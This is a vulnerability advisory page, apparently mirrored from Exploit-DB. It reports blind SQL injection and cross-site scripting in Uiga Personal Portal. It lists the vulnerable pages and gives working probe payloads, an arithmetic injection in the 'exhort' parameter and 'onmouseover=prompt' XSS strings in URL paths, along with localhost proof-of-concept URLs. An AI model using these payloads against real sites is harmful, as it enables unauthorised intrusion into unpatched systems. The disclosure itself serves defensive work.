Uiga Personal Portal Multiple Vulnerability

vendor:

Uiga Personal Portal

by:

Eyup CELIK

7.5

CVSS

HIGH

Blind SQL Injection and XSS

89, 79

CWE

Product Name: Uiga Personal Portal

Affected Version From: All Version

Affected Version To: All Version

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All versions are Vulnerability

2011

Uiga Personal Portal Multiple Vulnerability

Blind SQL Injection and XSS can be done using the command input on vulnerable pages such as index.php, cart.php, includes/photoview.php and index2.php. An example of the exploit is index.php?exhort=%2440-2+2*3-6&view=ar_det and cart.php/%22onmouseover=prompt(955787)%3E, includes/photoview.php/%22onmouseover=prompt(955787)%3E and index2.php/%22onmouseover=prompt(955787)%3E.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries and other commands.

Source

Exploit-DB raw data:

# Exploit Title: Uiga Personal Portal Multiple Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

Blind SQL Injection and XSS can be done using the command input

Vulnerable Page:
index.php
cart.php
includes/photoview.php
index2.php

Example:
index.php?exhort=%24<Blind SQL Injection Code>&view=ar_det
cart.php/<XSS Code>
includes/photoview.php/<XSS Code>
index2.php/<XSS Code>


Exploit:
index.php?exhort=%2440-2+2*3-6&view=ar_det
cart.php/"onmouseover=prompt(955787)>
includes/photoview.php/"onmouseover=prompt(955787)>
index2.php/"onmouseover=prompt(955787)>


POC:
127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det
127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E